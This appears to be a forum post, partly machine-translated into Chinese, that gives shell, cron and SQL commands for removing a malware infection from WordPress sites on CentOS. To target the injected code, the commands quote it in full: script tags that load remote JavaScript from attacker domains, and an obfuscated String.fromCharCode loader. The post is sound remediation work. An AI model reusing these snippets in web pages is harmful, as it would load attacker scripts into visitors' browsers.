这是我针对linux centos的命令列表:
1. remove malware scripts
find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
将此命令放在cron中以保持服务器干净(如果在服务器中发现恶意文件,则每15分钟删除一次):
# execute every 15 minutes
*/15 * * * * find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
2. clean cache from WP plugin
3. clean db
使用此sql查询
#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://js.donatelloflowfirstly.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type=\'text/javascript\' src=\'https://js.donatelloflowfirstly.ga/stat.js?w=1\'></script", \'\'));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://js.donatelloflowfirstly.ga/statistics.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://js.donatelloflowfirstly.ga/statistics.js?n=ns1"" type=""text/javascript""></script>", \'\'));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://scripts.lowerbeforwarden.ml/src.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://scripts.lowerbeforwarden.ml/src.js?n=ns1"" type=""text/javascript""></script>", \'\'));
#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%"
4. check and clean malicious code inside the file
检查纯文本恶意代码:
cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"
以纯文本形式注入的干净代码:
grep -rlF "donatello" | xargs sed -i "s/<script type=\'text\\/javascript\' src=\'https:\\/\\/js.donatelloflowfirstly.ga\\/statistics.js?n=nb5\'><\\/script>//g"
grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type=\'text\\/javascript\' src=\'https:\\/\\/scripts.lowerbeforwarden.ml\\/src.js?n=nb5\'><\\/script>//g"
如果转换数字字符串,请检查加密的恶意代码
String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)
在utf8中,将看到:
h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s
找到代码:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"
删除代码:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\\[0\\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\].appendChild(elem);})();<\\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\\[0\\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\].appendChild(elem);})();//g"
最后一个加密的字符串与;“lowerbeforwarden”;变种使用正确的顺序;多纳泰罗;。
希望这有帮助。